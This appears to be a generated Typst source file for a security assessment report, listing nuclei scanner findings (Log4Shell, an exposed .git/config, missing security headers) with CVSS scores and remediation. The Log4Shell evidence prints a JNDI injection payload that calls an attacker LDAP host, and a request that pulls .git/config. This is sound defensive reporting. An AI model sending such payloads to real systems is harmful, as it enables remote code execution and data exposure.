// Generated by scanner_to_typst.py — do not hand-edit blindly.
// Each #finding(...) block can be moved to a different severity
// chapter; the report card auto-sorts by severity.

// Source: nuclei:['pdteam']
#finding(
  id: "F-001",
  title: "Apache Log4j2 Remote Code Execution (Log4Shell)",
  severity: "critical",
  cvss-score: 10.0,
  cvss-vector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  cvss-criteria: (av: "Network", ac: "Low", pr: "None", ui: "None", s: "Changed", c: "High", i: "High", a: "High"),
  hosts: ("https://api.example.com", "https://api.example.com/login"),
  impact: "High",
  likelihood: "High",
  status: "open",
  axis-risk: "high",
  axis-sophistication: "low",
  axis-remediation: "medium",
  description: [Apache Log4j2 versions 2.0-beta9 through 2.15.0 (excluding 2.12.2) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.],
  business-impact: [CISA notes this CVE is used in known ransomware campaigns.],
  evidence: [*Request*

#raw("POST /login HTTP/1.1\nHost: api.example.com\nContent-Type: application/json\n\n{\"username\":\"${jndi:ldap://attacker.example.com/a}\",\"password\":\"x\"}\n", block: true, lang: "http")


*Response*

#raw("HTTP/1.1 200 OK\nContent-Length: 18\n\n{\"status\":\"ok\"}\n[Out-of-band callback received on attacker LDAP server]\n", block: true, lang: "http")


*Extracted*

#raw("LDAP callback to attacker.example.com:1389\n", block: true)],
  remediation: [Upgrade Apache Log4j2 to a version of 2.17.0 (Java 8) or 2.12.3 (Java 7) or 2.3.1 (Java 6).],
  cwe: ("CWE-77", "CWE-502", "CWE-20", "CWE-400", "CWE-917"),
  compliance: ("CISA KEV (actively exploited)",),
  references: ("https://logging.apache.org/log4j/2.x/security.html", "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "https://cwe.mitre.org/data/definitions/77.html", "https://owasp.org/www-community/attacks/Command_Injection"),
)

// Source: nuclei:['pdteam']
#finding(
  id: "F-002",
  title: "Publicly Exposed .git/config",
  severity: "medium",
  cvss-score: 5.3,
  cvss-vector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  cvss-criteria: (av: "Network", ac: "Low", pr: "None", ui: "None", s: "Unchanged", c: "Low", i: "None", a: "None"),
  hosts: ("https://app.example.com", "https://app.example.com/.git/config"),
  impact: "Medium",
  likelihood: "Medium",
  status: "open",
  axis-risk: "medium",
  axis-sophistication: "medium",
  axis-remediation: "low",
  description: [The repository's .git/config file is reachable on the public web server, exposing remote URLs and potentially credentials.],
  business-impact: [\[Business impact pending — write 2–4 sentences in client terms.\]],
  evidence: [*Request*

#raw("GET /.git/config HTTP/1.1\nHost: app.example.com\n", block: true, lang: "http")


*Response*

#raw("HTTP/1.1 200 OK\n\n[core]\n    repositoryformatversion = 0\n[remote \"origin\"]\n    url = git@github.com:client/internal-app.git\n", block: true, lang: "http")],
  remediation: [Block access to .git/ at the web server or reverse proxy layer.],
  cwe: ("CWE-538",),
  references: ("https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/01-Information_Gathering/03-Review_Webserver_Metafiles_for_Information_Leakage", "https://cwe.mitre.org/data/definitions/538.html"),
)

// Source: nuclei:['pdteam']
#finding(
  id: "F-003",
  title: "HTTP Missing Security Headers (Strict-Transport-Security, CSP)",
  severity: "info",
  cvss-score: 0.0,
  hosts: ("https://app.example.com", "https://app.example.com/"),
  impact: "Low",
  likelihood: "Low",
  status: "open",
  axis-risk: "low",
  axis-sophistication: "high",
  axis-remediation: "low",
  description: [The response does not include Strict-Transport-Security and Content-Security-Policy headers, leaving the site exposed to protocol-downgrade and cross-site scripting risks.],
  business-impact: [\[Business impact pending — write 2–4 sentences in client terms.\]],
  remediation: [Add Strict-Transport-Security (HSTS) and a restrictive Content-Security-Policy header to all responses at the edge / framework layer.],
  cwe: ("CWE-693",),
  references: ("https://owasp.org/www-project-secure-headers/", "https://cwe.mitre.org/data/definitions/693.html"),
)
